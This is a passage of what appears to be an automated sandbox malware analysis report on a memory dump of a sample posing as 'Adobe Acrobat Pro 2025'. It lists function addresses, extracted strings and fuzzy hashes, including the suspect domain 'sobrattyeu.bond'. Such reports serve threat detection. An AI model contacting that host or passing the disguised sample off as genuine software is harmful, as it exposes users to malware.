0, xrefs: 0040543B
8, xrefs: 00405433

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 534e511cde74880e7976e38b915f84be3f4e279ebedb9b19c2cd4e34d2186183
Instruction ID: 6e5109cd2d10a3ce700c91e1efe323ebaab0bda7a0c626d8cff65e39f9de6d6d
Opcode Fuzzy Hash: 534e511cde74880e7976e38b915f84be3f4e279ebedb9b19c2cd4e34d2186183
Instruction Fuzzy Hash: 227224B1608341AFD710CF18C884BABBBE1BF84314F14892EF99997391D379D958CB96

Function 0043BBA7 Relevance: 3.3, Strings: 2, Instructions: 779COMMON

Download Yara Rule

Strings

%~, xrefs: 0043C0C9
ol, xrefs: 0043C1A9

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: %~$ol
API String ID: 0-3720754401
Opcode ID: 977080fa405b579a746b497e18cfd583f22407e49e0f03e5cb58d8a723570341
Instruction ID: baf69a8c18ca2306aee02dcb5631b454d386f3663f5b65f573cbb52ebe406c32
Opcode Fuzzy Hash: 977080fa405b579a746b497e18cfd583f22407e49e0f03e5cb58d8a723570341
Instruction Fuzzy Hash: 2322283A628315CBC7189F39D8912ABB3E2EFC9350F0A983DD58687391E7789D41C746

Function 0042C210 Relevance: 3.0, Strings: 2, Instructions: 510COMMON

Download Yara Rule

Strings

", xrefs: 0042C66D
", xrefs: 0042C5B4

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: b4085f626e50738ff4f2566d31b5a5b20e4b887be6058a58894cdaf6a166b9d0
Instruction ID: a523829712920bbc83a25c3d1ae515eabda41fb152c5e9fcf0275a9c012e743c
Opcode Fuzzy Hash: b4085f626e50738ff4f2566d31b5a5b20e4b887be6058a58894cdaf6a166b9d0
Instruction Fuzzy Hash: EAF12372B083218BC714CE28E4D076FB7D6AF84314F998A6EE89587381D778DD0587C6

Function 00420BB0 Relevance: 3.0, Strings: 2, Instructions: 458COMMON

Download Yara Rule

Strings

", xrefs: 00420FE3
9?, xrefs: 00420BF1

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: "$9?
API String ID: 0-1055624263
Opcode ID: 973ef1f5f89ac190967a8a83e7b0614a773ef66dabf4f949533e35b19882e380
Instruction ID: e1c0d0d59b0ab738d35e0d448e53c5d4545eabe86e1ce9839dde85d2475e9790
Opcode Fuzzy Hash: 973ef1f5f89ac190967a8a83e7b0614a773ef66dabf4f949533e35b19882e380
Instruction Fuzzy Hash: 66D1EF716083508BD724CF24D891A6BBBF1EFC5318F15892DFA858B392E3B9D845CB46

Function 0043B400 Relevance: 2.9, Strings: 2, Instructions: 428COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043B640
), xrefs: 0043B4C0

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: NP,?$)
API String ID: 0-391089595
Opcode ID: a662633c431ede11b9865ce36b91381507d373ff81f06591676ae10b5cc9a0de
Instruction ID: 56d81b6ff76c2ff54b587f87edfe0b4700512d8e184875081f3bcd1ad9aee47e
Opcode Fuzzy Hash: a662633c431ede11b9865ce36b91381507d373ff81f06591676ae10b5cc9a0de
Instruction Fuzzy Hash: 0BB16B76A043019BD314CF24C881B2BB7E6EBCD318F19962EEA9457391D338DC0587DA

Function 00428A7F Relevance: 2.9, Strings: 2, Instructions: 393COMMON

Download Yara Rule

Strings

n-%0, xrefs: 00428B38, 00428B4C, 00428B50
;;8(, xrefs: 00428B1D

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ;;8($n-%0
API String ID: 0-4089337320
Opcode ID: 8aae50bbf51908535cf535f427bdb37c8f840b7a4e56d66ec2ec6b3550244bc3
Instruction ID: 48b29b9102fe4bc992b3dee5b2baa7e008007b244246b4bc12314b54203a2dbb
Opcode Fuzzy Hash: 8aae50bbf51908535cf535f427bdb37c8f840b7a4e56d66ec2ec6b3550244bc3
Instruction Fuzzy Hash: 90D15674A09351CFD314CF24E88072ABBE2AF86314F594ABDE495873A1D734DC06CB8A

Function 004090B0 Relevance: 2.9, Strings: 2, Instructions: 372COMMON

Download Yara Rule

Strings

!%%, xrefs: 004091A8
+, xrefs: 00409396

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: !%%$+
API String ID: 0-3848094840
Opcode ID: 61f2b878feae8428ddcbd23783aa62e22ef35dacadad0bfc8f11f9ac24dc2397
Instruction ID: 357bb962709d15679e677d25e08bf54768e93eafb9716b95557a169215b293b8
Opcode Fuzzy Hash: 61f2b878feae8428ddcbd23783aa62e22ef35dacadad0bfc8f11f9ac24dc2397
Instruction Fuzzy Hash: 4FA1D67114C3C19BD3268F2984A065BFFE1AFD7304F4889ADE4D55B382D339880ADB66

Function 0041AF75 Relevance: 2.9, Strings: 2, Instructions: 368COMMON

Download Yara Rule

Strings

9o*i, xrefs: 0041B2A4
Z[, xrefs: 0041B240

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: 9o*i$Z[
API String ID: 0-398712514
Opcode ID: 7ac2862a09adc6c69c57191a664bf0412cd2f8b139d339a74807d507616c03c7
Instruction ID: 58c06a55078c9680614555fdd29fe768a9a1e3b81f6ece5fb565ce09c970862b
Opcode Fuzzy Hash: 7ac2862a09adc6c69c57191a664bf0412cd2f8b139d339a74807d507616c03c7
Instruction Fuzzy Hash: 52B11875A183148BD718CF29CC523ABB7E2EFD5310F09892DE49687390E77C9A45878A

Function 0041BD20 Relevance: 2.8, Strings: 2, Instructions: 334COMMON

Download Yara Rule

Strings

+, xrefs: 0041BE6D
745*, xrefs: 0041BEAA

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: +$745*
API String ID: 0-3757857702
Opcode ID: 152dc998cf83984a32308d7d0881dd54c310aa60ac2cab710d09b0726f736a0a
Instruction ID: 57fb8a16fdecfea14a89cf148e227d23fabc8c265c289509f374e696490f5b79
Opcode Fuzzy Hash: 152dc998cf83984a32308d7d0881dd54c310aa60ac2cab710d09b0726f736a0a
Instruction Fuzzy Hash: 89A14C72A082614FC715CE288C9129FBBD1EBD5314F19823EE8B99B382D738DD4697C5

Function 004041E0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 004045D1
), xrefs: 0040425B

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 0da4d147bf18d80485ad50d5e5eff1d4973a1679be5f306baca0a36c38e17df3
Instruction ID: 9ae3b0fe7b746c8bc780c6e6cbc41e852e99e78e542014547ec7f289ec28e8f4
Opcode Fuzzy Hash: 0da4d147bf18d80485ad50d5e5eff1d4973a1679be5f306baca0a36c38e17df3
Instruction Fuzzy Hash: 64D1B3B1A08344AFD710DF14D845B5BBBE4AB94308F14492EFA996B3C1D379E908CB97

Function 00435230 Relevance: 2.7, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

|, xrefs: 004352AF
}, xrefs: 004352B4

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: |$}
API String ID: 0-2113315841
Opcode ID: 7c07dbd6d2419de960c708a57ae52c3ba4f5047bea2c716695fe66798e7771b8
Instruction ID: 1270dc17ba6619058a811d9f0117db999f4bb892b5335fcc53642fd21889c273
Opcode Fuzzy Hash: 7c07dbd6d2419de960c708a57ae52c3ba4f5047bea2c716695fe66798e7771b8
Instruction Fuzzy Hash: 3161162375DA804BD318997C5C523AABA830BDB234F2DD36EE5F5CB3E1D4AD88028345

Function 00419570 Relevance: 2.7, Strings: 2, Instructions: 221COMMON

Download Yara Rule

Strings

|, xrefs: 004195F1
}, xrefs: 004195F6

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: |$}
API String ID: 0-2113315841
Opcode ID: 474dc377b103320a5ba9e48515ded285b3ed7e0c4bf0b69feaead0ffbaea7df4
Instruction ID: 4af8b7afc6720037331d49c5cd499bbe55de977992c14e6cb2513135f59938b9
Opcode Fuzzy Hash: 474dc377b103320a5ba9e48515ded285b3ed7e0c4bf0b69feaead0ffbaea7df4
Instruction Fuzzy Hash: EE711536609AC14BD728993C4C613AAAA830FD3230F2CC36EE6F5873E1D9694C428315

Function 0041C720 Relevance: 2.7, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

}, xrefs: 0041C79E
|, xrefs: 0041C799

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: |$}
API String ID: 0-2113315841
Opcode ID: f29ade138f30065d5becb725c76ccd8aa982389180371917f76f839458efce28
Instruction ID: 70334dec6c98eed146435f5dbdcc7dca3ce967c8233029953e4f7c443ab097d4
Opcode Fuzzy Hash: f29ade138f30065d5becb725c76ccd8aa982389180371917f76f839458efce28
Instruction Fuzzy Hash: BE6138337996C14BD728993C4C913AABA834BD3330F2DC7AEE5F6873E5D56948418349

Function 004021A0 Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

`~@, xrefs: 004021FA, 0040220D, 0040221D, 0040222F, 00402240
p~@, xrefs: 004022E5, 004022EF, 004022FC, 00402308, 00402312

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: `~@$p~@
API String ID: 0-3284198066
Opcode ID: 41437a8101b37744e12bf9b691ffb7add24e94047e6f52a856f2a0e380857328
Instruction ID: 2a7c6443ec21b9ef3f955ad3aa7b581e2f21f2f296077bd83f890e251f456ee2
Opcode Fuzzy Hash: 41437a8101b37744e12bf9b691ffb7add24e94047e6f52a856f2a0e380857328
Instruction Fuzzy Hash: 4451D3B59007019BD7109F289D4871BB6A5BF41328F14473DE8A6A73D2D378E914CB8A

Function 0041C990 Relevance: 2.6, Strings: 1, Instructions: 1356COMMON

Download Yara Rule

Strings

?OII[KGEDf, xrefs: 0041D984

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ?OII[KGEDf
API String ID: 0-1071919276
Opcode ID: cb9919dbf167e1d955e373de16c8cb2174965cd35d1ce9e9db6d3f032b6276e7
Instruction ID: 327ab84ec14f7691c27d0a1a67e5f592c9f1206abe195830558f23f944113e78
Opcode Fuzzy Hash: cb9919dbf167e1d955e373de16c8cb2174965cd35d1ce9e9db6d3f032b6276e7
Instruction Fuzzy Hash: 00C20471E046918FC715CB3CC84439DBBE26F56324F1983ADD8A99B3C1D739A841CB96

Function 0042F490 Relevance: 2.1, Strings: 1, Instructions: 899COMMON

Download Yara Rule

Strings

E[T, xrefs: 0042F8BB

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: E[T
API String ID: 0-3706153469
Opcode ID: 16543ac07c058379639b2d50667f02bd0b564c94370b6964d28f6de4af4b7260
Instruction ID: 114934453571a66f8b62182cbcfd55bd13b2163483becaa5a61e433d5a71dda4
Opcode Fuzzy Hash: 16543ac07c058379639b2d50667f02bd0b564c94370b6964d28f6de4af4b7260
Instruction Fuzzy Hash: 27923AB0605B408FD369CF38C89179BBFE5AB5A304F14896ED5AEC7382CB7865018F59

Function 00440960 Relevance: 1.8, Strings: 1, Instructions: 595COMMON

Download Yara Rule

Strings

v2, xrefs: 00440E5F

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: v2
API String ID: 0-3610191476
Opcode ID: 40c602474030c8c73831ef9ffdf32559ac228281c7b4795577432c1a8c2df3db
Instruction ID: a972db8eedb500ed91f2ffaea03cb88f82b98ef86e8450ea24dbf502f3a1366a
Opcode Fuzzy Hash: 40c602474030c8c73831ef9ffdf32559ac228281c7b4795577432c1a8c2df3db
Instruction Fuzzy Hash: 7B02653AB44215CFDB08CF68D8D06AEB7B2FB8A310F1A807AC545A7351D7789C61CB85

Function 00427BDF Relevance: 1.8, Strings: 1, Instructions: 554COMMON

Download Yara Rule

Strings

otq], xrefs: 0042807C

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: otq]
API String ID: 0-839359803
Opcode ID: 4acbcab566f93c700fa1912e48c510cd10594fb071433097e970f084cc07f58d
Instruction ID: a288fc3780ad25d911eaafaccf82db0ce43a38c25dfff664257d061d0ae24e60
Opcode Fuzzy Hash: 4acbcab566f93c700fa1912e48c510cd10594fb071433097e970f084cc07f58d
Instruction Fuzzy Hash: F20202B160C3518BC714CF29D85126FBBE1EF86308F09897EE5C58B351D739A905CB9A

Function 00426F60 Relevance: 1.8, Strings: 1, Instructions: 527COMMON

Download Yara Rule

Strings

y,h", xrefs: 004270EA

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: y,h"
API String ID: 0-2120232901
Opcode ID: 953aba21a028af069c6c46383f68c478a596fb143f104a4f340c0deff3484d27
Instruction ID: 5e81963439d388f1739dbc2b4e70e99210f8604ae20e75dd7ee0fa135d3cda13
Opcode Fuzzy Hash: 953aba21a028af069c6c46383f68c478a596fb143f104a4f340c0deff3484d27
Instruction Fuzzy Hash: 4C0200B5E05229CBDB10CFA8DC817AEBBB1FF45304F5481A9D585B7250DB382A82CF94

Function 00440A50 Relevance: 1.8, Strings: 1, Instructions: 524COMMON

Download Yara Rule

Strings

v2, xrefs: 00440E5F

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: v2
API String ID: 0-3610191476
Opcode ID: e024f6c8919d3644d047017d6c1220049fbe332a8c4d709a28d936a7929625ab
Instruction ID: 61c44af7e63c6cdb91430491986213b4be5ffd3a3d3308c9dc5acc75a20fc947
Opcode Fuzzy Hash: e024f6c8919d3644d047017d6c1220049fbe332a8c4d709a28d936a7929625ab
Instruction Fuzzy Hash: 0EF1343AB44215CFCB08CFA8D9D06AEB7B2FB8A310F1A817AD545A7351D7749C52CB84

Function 004263E6 Relevance: 1.8, Strings: 1, Instructions: 517COMMON

Download Yara Rule

Strings

rp, xrefs: 004264DD

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: rp
API String ID: 0-2379820387
Opcode ID: f138c6d703ad1ee371f4710a49d14912fb5baea5434e71e664ec8550ed04e5fd
Instruction ID: 02368ab2b0f91957e834ae42394f174cf12b1f23009208bce66a262cb32514fc
Opcode Fuzzy Hash: f138c6d703ad1ee371f4710a49d14912fb5baea5434e71e664ec8550ed04e5fd
Instruction Fuzzy Hash: DC02F676F01226CBCB14CF68D8905EEB7B2FF89710B6A8159C841AB354DB34AD52CB94

Function 00413A92 Relevance: 1.7, Strings: 1, Instructions: 486COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00413B30

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 5166365370361b97b376901b7fe18715d89495f6484a4f1949b94ab9a0b4e06f
Instruction ID: a37ab3c75efd59c2d0e775eb26f5e8f1e6240f5056ec73b537b8fef51fed2c87
Opcode Fuzzy Hash: 5166365370361b97b376901b7fe18715d89495f6484a4f1949b94ab9a0b4e06f
Instruction Fuzzy Hash: 4FE1F3B8A00201EFEB148F18EC51BBE7772FB4A315F254129F501A72E2D7756DA1CB89

Function 00440B60 Relevance: 1.7, Strings: 1, Instructions: 448COMMON

Download Yara Rule

Strings

v2, xrefs: 00440E5F

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: v2
API String ID: 0-3610191476
Opcode ID: af82ab7660d69fd11b4fb50e3d04c02d216badb1d23d47fd43d20ce2476792d5
Instruction ID: 5ec9ea3a0d334e1155a2683f1737ab31fc38673cbc98bd7671075074072f8459
Opcode Fuzzy Hash: af82ab7660d69fd11b4fb50e3d04c02d216badb1d23d47fd43d20ce2476792d5
Instruction Fuzzy Hash: 47D1047AB44215CFDB08CFA8D8906AEB7B2FB8A310F19817AD505E7351C7789C52CB94

Function 00440C10 Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

v2, xrefs: 00440E5F

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: v2
API String ID: 0-3610191476
Opcode ID: 234d88bc84070b473d2b585712d3d0d5a6311c773332a2f36bbb6104a35526ed
Instruction ID: ef03bd9d8e55830948a5d701fee747f1adb9c0f2d02fb52582c12b3fe995ab51
Opcode Fuzzy Hash: 234d88bc84070b473d2b585712d3d0d5a6311c773332a2f36bbb6104a35526ed
Instruction Fuzzy Hash: 63D10076F042158FDB08CF68D8916AEB7F2FB8A310F1A817AD905E7351C7389C528B94

Function 0040C7F5 Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

sobrattyeu.bond, xrefs: 0040CCE6

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: sobrattyeu.bond
API String ID: 0-1398321731
Opcode ID: 2dab01d3b4e53b9d8e325295c8ed847c784aa84951f89f5292921b85a39972b0
Instruction ID: c04608bbbf97e7b43d50dd74cc81f14e1c15ee65f3f5eb67e64e1ae69fc6b138
Opcode Fuzzy Hash: 2dab01d3b4e53b9d8e325295c8ed847c784aa84951f89f5292921b85a39972b0
Instruction Fuzzy Hash: D5C139B36187918BC734CF69C88439BBBD2EBD5304F198A7EC4D9DB352D63884058B92

Function 00408DB0 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

D, xrefs: 00408F33

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: ab158a4b577078dcdf7689f773709a0d00a240c19b9027202b2a83339d77cc13
Instruction ID: c2e46f767fd3ffd3af9e90fcd71b6d5388d7b906b06fabba274154998dc77a17
Opcode Fuzzy Hash: ab158a4b577078dcdf7689f773709a0d00a240c19b9027202b2a83339d77cc13
Instruction Fuzzy Hash: B381D67110C3868ED711CF3989507ABFFE1AFA2244F08457EE4D4A7382D779CA09876A

Function 0042DBC8 Relevance: 1.5, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

]yae, xrefs: 0042E024

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ]yae
API String ID: 0-37590157
Opcode ID: a1cf6b8832df0c808906b9c97feb84e1d505236b229a54cb5298b77fc7ae07a6
Instruction ID: b9e35292492262df472e40b6cfb5a3339ba73d390d0c7724bd8c49d7f99a6c7f
Opcode Fuzzy Hash: a1cf6b8832df0c808906b9c97feb84e1d505236b229a54cb5298b77fc7ae07a6
Instruction Fuzzy Hash: C9810270604B918FD729CF39D460762BBE1AF57314F2885AED0E68B392DA399806CB15

Function 0042DC59 Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

]yae, xrefs: 0042E024

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ]yae
API String ID: 0-37590157
Opcode ID: 8705831e12a61e0a691ba78332f371b5fc60684b0726024fb1a730153ffb950a
Instruction ID: d023c631af046cce7bb801dff8bf9f3e8e0fa66031edec198c46adaf869a30ec
Opcode Fuzzy Hash: 8705831e12a61e0a691ba78332f371b5fc60684b0726024fb1a730153ffb950a
Instruction Fuzzy Hash: 8981E270604B928FD729CF399460762BBE1AF57314F2885AED0E7CB392DA399406CB15

Function 0042DCEB Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

]yae, xrefs: 0042E024

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ]yae
API String ID: 0-37590157
Opcode ID: ef91d6eceadc59727e85a7396e9c9a3b2768966d56ae4abf2687358246960397
Instruction ID: a96ffd68a5b8a1e76e44cff060782bd4488c667ce81603b390ff8eeb13499da7
Opcode Fuzzy Hash: ef91d6eceadc59727e85a7396e9c9a3b2768966d56ae4abf2687358246960397
Instruction Fuzzy Hash: 3381F370604B928FD729CF399460762BBE1AF57314F2885AED0E7CB392DA399406CB15

Function 00441C30 Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

G%&, xrefs: 00441CFF

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: G%&
API String ID: 0-1540628794
Opcode ID: 151292a276e6f32e775cc2454b13512a109e8d24b5bfb9f38d80741a631cef2a
Instruction ID: 95a89af1a39cc399cf714da6871d0023d325a7c427c37be7c451c990211b7edd
Opcode Fuzzy Hash: 151292a276e6f32e775cc2454b13512a109e8d24b5bfb9f38d80741a631cef2a
Instruction Fuzzy Hash: E2913376A053159BD324CF18C880A6BB3B2FF89310F29862DED955B3B1D774AC91C789

Function 00405CD0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 00405E06

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 032979fbd8883524b2f5b732a4a7eb679e248c0839feb764d429df90902c2ded
Instruction ID: ab1528570ae6150f03868941327823b095c783d4221795c3d0a928cb9426d710
Opcode Fuzzy Hash: 032979fbd8883524b2f5b732a4a7eb679e248c0839feb764d429df90902c2ded
Instruction Fuzzy Hash: 56B139711097819FD321CF18C88461BBBE0AFA9704F448E2EE5D597782D635E918CB97

Function 0042DCD8 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

]yae, xrefs: 0042E024

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ]yae
API String ID: 0-37590157
Opcode ID: c09f678ade7dcfa146e46a8e7cd327cab96e0d0666902b05c217784df6fce4b6
Instruction ID: c2c8aeebdafda6a7a81793afbd0f44e45149bd652a6f74f7ad960d94f052ba00
Opcode Fuzzy Hash: c09f678ade7dcfa146e46a8e7cd327cab96e0d0666902b05c217784df6fce4b6
Instruction Fuzzy Hash: E1711570604B918FD729CF39D460763BBE1AF57314F2885AED0E68F392DA399806CB15

Function 0041A1DC Relevance: 1.5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

0, xrefs: 0041A352

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9a3d0296c55e282129bf5f891c14e37b2469affb97a810b21f259691d603cb15
Instruction ID: c80ec96c2a986be347924703feeee910687cab64d4e25ccfef3c532eb8438d1c
Opcode Fuzzy Hash: 9a3d0296c55e282129bf5f891c14e37b2469affb97a810b21f259691d603cb15
Instruction Fuzzy Hash: 0151F53160D2818BD718CB3888917ABBFE2ABD3314F2845AEE4D2C7396D639C5468357

Function 0043FE0B Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

;T*J, xrefs: 0043FE8A

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

